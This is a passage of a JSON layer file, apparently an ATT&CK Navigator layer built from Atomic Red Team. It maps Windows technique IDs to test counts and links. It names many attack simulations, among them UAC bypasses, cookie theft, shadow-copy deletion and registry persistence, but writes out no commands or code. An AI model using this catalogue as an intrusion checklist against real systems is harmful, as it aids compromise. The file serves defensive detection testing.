Manipulation\n- WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":5,"enabled":true,"comment":"\n- Parent PID Spoofing using PowerShell\n- Parent PID Spoofing - Spawn from Current Process\n- Parent PID Spoofing - Spawn from Specified Process\n- Parent PID Spoofing - Spawn from svchost.exe\n- Parent PID Spoofing - Spawn from New Process\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134.005","score":1,"enabled":true,"comment":"\n- Injection SID-History with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.005/T1134.005.md"}]},{"techniqueID":"T1135","score":7,"enabled":true,"comment":"\n- Network Share Discovery command prompt\n- Network Share Discovery PowerShell\n- View available share drives\n- Share Discovery with PowerView\n- PowerView ShareFinder\n- WinPwn - shareenumeration\n- Network Share Discovery via dir command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":4,"enabled":true,"comment":"\n- Create a new user in a command prompt\n- Create a new user in PowerShell\n- Create a new Windows admin user\n- Create a new Windows admin user via .NET\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":3,"enabled":true,"comment":"\n- Create a new Windows domain admin user\n- Create a new account similar to ANONYMOUS LOGON\n- Create a new Domain Account using PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1137","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}],"comment":"\n- Office Application Startup - Outlook as a C2\n"},{"techniqueID":"T1137.001","score":1,"enabled":true,"comment":"\n- Injecting a Macro into the Word Normal.dotm Template for Persistence via PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.001/T1137.001.md"}]},{"techniqueID":"T1137.002","score":1,"enabled":true,"comment":"\n- Office Application Startup Test Persistence (HKCU)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":1,"enabled":true,"comment":"\n- Install Outlook Home Page Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":5,"enabled":true,"comment":"\n- Code Executed Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Word Add-in File (WLL)\n- Persistent Code Execution Via Excel VBA Add-in File (XLAM)\n- Persistent Code Execution Via PowerPoint VBA Add-in File (PPAM)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1140","score":2,"enabled":true,"comment":"\n- Deobfuscate/Decode Files Or Information\n- Certutil Rename and Decode\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":5,"enabled":true,"comment":"\n- Chrome/Chromium (Developer Mode)\n- Chrome/Chromium (Chrome Web Store)\n- Firefox\n- Edge Chromium Addon - VPN\n- Google Chrome Load Unpacked Extension With Command Line\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":2,"enabled":true,"comment":"\n- PetitPotam\n- WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"comment":"\n- Octopus Scanner Malware Open Source Supply Chain\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1197","score":4,"enabled":true,"comment":"\n- Bitsadmin Download (cmd)\n- Bitsadmin Download (PowerShell)\n- Persist, Download, & Execute\n- Bits download using desktopimgdownldr.exe (cmd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":5,"enabled":true,"comment":"\n- Examine local password policy - Windows\n- Examine domain password policy - Windows\n- Get-DomainPolicy with PowerView\n- Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy\n- Use of SecEdit.exe to export the local security policy (including the password policy)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":3,"enabled":true,"comment":"\n- Indirect Command Execution - pcalua.exe\n- Indirect Command Execution - forfiles.exe\n- Indirect Command Execution - conhost.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204/T1204.md"}]},{"techniqueID":"T1204.002","score":11,"enabled":true,"comment":"\n- OSTap Style Macro Execution\n- OSTap Payload Download\n- Maldoc choice flags command execution\n- OSTAP JS version\n- Office launching .bat file from AppData\n- Excel 4 Macro\n- Headless Chrome code execution via VBA\n- Potentially Unwanted Applications (PUA)\n- Office Generic Payload Download\n- LNK Payload Download\n- Mirror Blast Emulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204.003","score":1,"enabled":true,"comment":"\n- Malicious Execution from Mounted ISO Image\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.003/T1204.003.md"}]},{"techniqueID":"T1207","score":1,"enabled":true,"comment":"\n- DCShadow (Active Directory)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}],"comment":"\n- SyncAppvPublishingServer Signed Script PowerShell Command Execution\n- manage-bde.wsf Signed Script Command Execution\n"},{"techniqueID":"T1216.001","score":1,"enabled":true,"comment":"\n- PubPrn.vbs Signed Script Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1217","score":4,"enabled":true,"comment":"\n- List Google Chrome / Opera Bookmarks on Windows with powershell\n- List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt\n- List Mozilla Firefox bookmarks on Windows with command prompt\n- List Internet Explorer Bookmarks using the command prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218","score":78,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}],"comment":"\n- mavinject - Inject DLL into running process\n- Register-CimProvider - Execute evil dll\n- InfDefaultInstall.exe .inf Execution\n- ProtocolHandler.exe Downloaded a Suspicious File\n- Microsoft.Workflow.Compiler.exe Payload Execution\n- Renamed Microsoft.Workflow.Compiler.exe Payload Executions\n- Invoke-ATHRemoteFXvGPUDisablementCommand base test\n- DiskShadow Command Execution\n- Load Arbitrary DLL via Wuauclt (Windows Update Client)\n- Lolbin Gpscript logon option\n- Lolbin Gpscript startup option\n- Lolbas ie4uinit.exe use as proxy\n- LOLBAS CustomShellHost to Spawn Process\n- Provlaunch.exe Executes Arbitrary Command via Registry Key\n- LOLBAS Msedge to Spawn Process\n"},{"techniqueID":"T1218.001","score":8,"enabled":true,"comment":"\n- Compiled HTML Help Local Payload\n- Compiled HTML Help Remote Payload\n- Invoke CHM with default Shortcut Command Execution\n- Invoke CHM with InfoTech Storage Protocol Handler\n- Invoke CHM Simulate Double click\n- Invoke CHM with Script Engine and Help Topic\n- Invoke CHM Shortcut Command with ITS and Help Topic\n- Decompile Local CHM File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":1,"enabled":true,"comment":"\n- Control Panel Items\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":2,"enabled":true,"comment":"\n- CMSTP Executing Remote Scriptlet\n- CMSTP Executing UAC Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":8,"enabled":true,"comment":"\n- CheckIfInstallable method call\n- InstallHelper method call\n- InstallUtil class constructor method call\n- InstallUtil Install method call\n- InstallUtil Uninstall method call - /U variant\n- InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant\n- InstallUtil HelpText method call\n- InstallUtil evasive invocation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":10,"enabled":true,"comment":"\n- Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject\n- Mshta executes VBScript to execute malicious command\n- Mshta Executes Remote HTML Application (HTA)\n- Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement\n- Invoke HTML Application - Jscript Engine Simulating Double Click\n- Invoke HTML Application - Direct download from URI\n- Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler\n- Invoke HTML Application - JScript Engine with Inline Protocol Handler\n- Invoke HTML Application - Simulate Lateral Movement over UNC Path\n- Mshta used to Execute PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":11,"enabled":true,"comment":"\n- Msiexec.exe - Execute Local MSI file with embedded JScript\n- Msiexec.exe - Execute Local MSI file with embedded VBScript\n- Msiexec.exe - Execute Local MSI file with an embedded DLL\n- Msiexec.exe - Execute Local MSI file with an embedded EXE\n- WMI Win32_Product Class - Execute Local MSI file with embedded JScript\n- WMI Win32_Product Class - Execute Local MSI file with embedded VBScript\n- WMI Win32_Product Class - Execute Local MSI file with an embedded DLL\n- WMI Win32_Product Class - Execute Local MSI file with an embedded EXE\n- Msiexec.exe - Execute the DllRegisterServer function of a DLL\n- Msiexec.exe - Execute the DllUnregisterServer function of a DLL\n- Msiexec.exe - Execute Remote MSI file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":2,"enabled":true,"comment":"\n- Odbcconf.exe - Execute Arbitrary DLL\n- Odbcconf.exe - Load Response File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":2,"enabled":true,"comment":"\n- Regasm Uninstall Method Call Test\n- Regsvcs Uninstall Method Call Test\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":5,"enabled":true,"comment":"\n- Regsvr32 local COM scriptlet execution\n- Regsvr32 remote COM scriptlet execution\n- Regsvr32 local DLL execution\n- Regsvr32 Registering Non DLL\n- Regsvr32 Silent DLL Install Call DllRegisterServer\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":14,"enabled":true,"comment":"\n- Rundll32 execute JavaScript Remote Payload With GetObject\n- Rundll32 execute VBscript command\n- Rundll32 execute VBscript command using Ordinal number\n- Rundll32 advpack.dll Execution\n- Rundll32 ieadvpack.dll Execution\n- Rundll32 syssetup.dll Execution\n- Rundll32 setupapi.dll Execution\n- Execution of HTA and VBS Files using Rundll32 and URL.dll\n- Launches an executable using Rundll32 and pcwutl.dll\n- Execution of non-dll using rundll32.exe\n- Rundll32 with Ordinal Value\n- Rundll32 with Control_RunDLL\n- Rundll32 with desk.cpl\n- Running DLL with .init extension and function\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1219","score":11,"enabled":true,"comment":"\n- TeamViewer Files Detected Test on Windows\n- AnyDesk Files Detected Test on Windows\n- LogMeIn Files Detected Test on Windows\n- GoToAssist Files Detected Test on Windows\n- ScreenConnect Application Download and Install on Windows\n- Ammyy Admin Software Execution\n- RemotePC Software Execution\n- NetSupport - RAT Execution\n- UltraViewer - RAT Execution\n- UltraVNC Execution\n- MSP360 Connect Execution\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":4,"enabled":true,"comment":"\n- MSXSL Bypass using local files\n- MSXSL Bypass using remote files\n- WMIC bypass using local XSL file\n- WMIC bypass using remote XSL file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":1,"enabled":true,"comment":"\n- WINWORD Remote Template Injection\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.001","score":5,"enabled":true,"comment":"\n- Take ownership using takeown utility\n- cacls - Grant permission to specified user or group recursively\n- attrib - Remove read-only attribute\n- attrib - hide file\n- Grant Full Access to folder for Everyone - Ryuk Ransomware Style\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1482","score":8,"enabled":true,"comment":"\n- Windows - Discover domain trusts with dsquery\n- Windows - Discover domain trusts with nltest\n- Powershell enumerate domains and forests\n- Adfind - Enumerate Active Directory OUs\n- Adfind - Enumerate Active Directory Trusts\n- Get-DomainTrust with PowerView\n- Get-ForestTrust with PowerView\n- TruffleSnout - Listing AD Infrastructure\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.001","score":2,"enabled":true,"comment":"\n- LockBit Black - Modify Group policy settings -cmd\n- LockBit Black - Modify Group policy settings -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.001/T1484.001.md"}]},{"techniqueID":"T1485","score":2,"enabled":true,"comment":"\n- Windows - Overwrite file with SysInternals SDelete\n- Overwrite deleted data on C drive\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":3,"enabled":true,"comment":"\n- PureLocker Ransom Note\n- Data Encrypted with GPG4Win\n- Data Encrypt Using DiskCryptor\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":3,"enabled":true,"comment":"\n- Windows - Stop service using Service Controller\n- Windows - Stop service using net.exe\n- Windows - Stop service by killing process\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":11,"enabled":true,"comment":"\n- Windows - Delete Volume Shadow Copies\n- Windows - Delete Volume Shadow Copies via WMI\n- Windows - wbadmin Delete Windows Backup Catalog\n- Windows - Disable Windows Recovery Console Repair\n- Windows - Delete Volume Shadow Copies via WMI with PowerShell\n- Windows - Delete Backup Files\n- Windows - wbadmin Delete systemstatebackup\n- Windows - Disable the SR scheduled task\n- Disable System Restore Through Registry\n- Windows - vssadmin Resize Shadowstorage Volume\n- Modify VSS Service Permissions\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491/T1491.md"}]},{"techniqueID":"T1491.001","score":2,"enabled":true,"comment":"\n- Replace Desktop Wallpaper\n- Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1497","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":2,"enabled":true,"comment":"\n- Detect Virtualization Environment (Windows)\n- Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505/T1505.md"}]},{"techniqueID":"T1505.002","score":1,"enabled":true,"comment":"\n- Install MS Exchange Transport Agent Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":1,"enabled":true,"comment":"\n- Web Shell Written to Disk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505.004","score":2,"enabled":true,"comment":"\n- Install IIS Module using AppCmd.exe\n- Install IIS Module using PowerShell Cmdlet New-WebGlobalModule\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.004/T1505.004.md"}]},{"techniqueID":"T1505.005","score":2,"enabled":true,"comment":"\n- Simulate Patching termsrv.dll\n- Modify Terminal Services DLL Path\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.005/T1505.005.md"}]},{"techniqueID":"T1518","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}],"comment":"\n- Find and Display Internet Explorer Browser Version\n- Applications Installed\n- WinPwn - Dotnetsearch\n- WinPwn - DotNet\n- WinPwn - powerSQL\n"},{"techniqueID":"T1518.001","score":7,"enabled":true,"comment":"\n- Security Software Discovery\n- Security Software Discovery - powershell\n- Security Software Discovery - Sysmon Service\n- Security Software Discovery - AV Discovery via WMI\n- Security Software Discovery - AV Discovery via Get-CimInstance and Get-WmiObject cmdlets\n- Security Software Discovery - Windows Defender Enumeration\n- Security Software Discovery - Windows Firewall Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1529","score":3,"enabled":true,"comment":"\n- Shutdown System - Windows\n- Restart System - Windows\n- Logoff System - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1531","score":3,"enabled":true,"comment":"\n- Change User Password - Windows\n- Delete User - Windows\n- Remove Account From Domain Admin Group\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1539","score":2,"enabled":true,"comment":"\n- Steal Firefox Cookies (Windows)\n- Steal Chrome Cookies (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1539/T1539.md"}]},{"techniqueID":"T1543","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.003","score":6,"enabled":true,"comment":"\n- Modify Fax service to run PowerShell\n- Service Installation CMD\n- Service Installation PowerShell\n- TinyTurla backdoor service w64time\n- Remote Service Installation CMD\n- Modify Service to Run Arbitrary Binary (Powershell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1546","score":27,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}],"comment":"\n- Persistence with Custom AutodialDLL\n- HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)\n- HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation)\n- WMI Invoke-CimMethod Start Process\n"},{"techniqueID":"T1546.001","score":1,"enabled":true,"comment":"\n- Change Default File Association\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":1,"enabled":true,"comment":"\n- Set Arbitrary Binary as Screensaver\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":3,"enabled":true,"comment":"\n- Persistence via WMI Event Subscription - CommandLineEventConsumer\n- Persistence via WMI Event Subscription - ActiveScriptEventConsumer\n- Windows MOFComp.exe Load MOF File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.007","score":1,"enabled":true,"comment":"\n- Netsh Helper DLL Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":4,"enabled":true,"comment":"\n- Attaches Command Prompt as a Debugger to a List of Target Processes\n- Replace binary of sticky keys\n- Create Symbolic Link From osk.exe to cmd.exe\n- Atbroker.exe (AT) Executes Arbitrary Command via Registry Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.009","score":1,"enabled":true,"comment":"\n- Create registry persistence via AppCert DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.009/T1546.009.md"}]},{"techniqueID":"T1546.010","score":1,"enabled":true,"comment":"\n- Install AppInit Shim\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":3,"enabled":true,"comment":"\n- Application Shim Installation\n- New shim database files created in the default shim database directory\n- Registry key creation and/or modification events for SDB\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":3,"enabled":true,"comment":"\n- IFEO Add Debugger\n- IFEO Global Flags\n- GlobalFlags in Image File Execution Options\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":1,"enabled":true,"comment":"\n- Append malicious start-process cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.015","score":4,"enabled":true,"comment":"\n- COM Hijacking - InprocServer32\n- Powershell Execute COM Object\n- COM Hijacking with RunDLL32 (Local Server Switch)\n- COM hijacking via TreatAs\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547","score":38,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}],"comment":"\n- Add a driver\n"},{"techniqueID":"T1547.001","score":17,"enabled":true,"comment":"\n- Reg Key Run\n- Reg Key RunOnce\n- PowerShell Registry RunOnce\n- Suspicious vbs file run from startup Folder\n- Suspicious jse file run from startup Folder\n- Suspicious bat file run from startup Folder\n- Add Executable Shortcut Link to User Startup Folder\n- Add persistance via Recycle bin\n- SystemBC Malware-as-a-Service Registry\n- Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value\n- Change Startup Folder - HKCU Modify User Shell Folders Startup Value\n- HKCU - Policy Settings Explorer Run Key\n- HKLM - Policy Settings Explorer Run Key\n- HKLM - Append Command to Winlogon Userinit KEY Value\n- HKLM - Modify default System Shell - Winlogon Shell KEY Value \n- secedit used to create a Run key in the HKLM Hive\n- Modify BootExecute Value\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":1,"enabled":true,"comment":"\n- Authentication Package\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.003","score":2,"enabled":true,"comment":"\n- Create a new time provider\n- Edit an existing time provider\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.003/T1547.003.md"}]},{"techniqueID":"T1547.004","score":5,"enabled":true,"comment":"\n- Winlogon Shell Key Persistence - PowerShell\n- Winlogon Userinit Key Persistence - PowerShell\n- Winlogon Notify Key Logon Persistence - PowerShell\n- Winlogon HKLM Shell Key Persistence - PowerShell\n- Winlogon HKLM Userinit Key Persistence - PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":2,"enabled":true,"comment":"\n- Modify HKLM:\\System\\CurrentControlSet\\Control\\Lsa Security Support Provider configuration in registry\n- Modify HKLM:\\System\\CurrentControlSet\\Control\\Lsa\\OSConfig Security Support Provider configuration in registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":1,"enabled":true,"comment":"\n- Snake Malware Kernel Driver Comadmin\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.008","score":1,"enabled":true,"comment":"\n- Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.008/T1547.008.md"}]},{"techniqueID":"T1547.009","score":2,"enabled":true,"comment":"\n- Shortcut Modification\n- Create shortcut to cmd in startup folders\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":1,"enabled":true,"comment":"\n- Add Port Monitor persistence in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.012","score":1,"enabled":true,"comment":"\n- Print Processors\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.012/T1547.012.md"}]},{"techniqueID":"T1547.014","score":3,"enabled":true,"comment":"\n- HKLM - Add atomic_test key to launch executable as part of user setup\n- HKLM - Add malicious StubPath value to existing Active Setup Entry\n- HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.014/T1547.014.md"}]},{"techniqueID":"T1547.015","score":1,"enabled":true,"comment":"\n- Persistence by modifying Windows Terminal profile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/T1547.015.md"}]},{"techniqueID":"T1548","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.002","score":26,"enabled":true,"comment":"\n- Bypass UAC using Event Viewer (cmd)\n- Bypass UAC using Event Viewer (PowerShell)\n- Bypass UAC using Fodhelper\n- Bypass UAC using Fodhelper - PowerShell\n- Bypass UAC using ComputerDefaults (PowerShell)\n- Bypass UAC by Mocking Trusted Directories\n- Bypass UAC using sdclt DelegateExecute\n- Disable UAC using reg.exe\n- Bypass UAC using 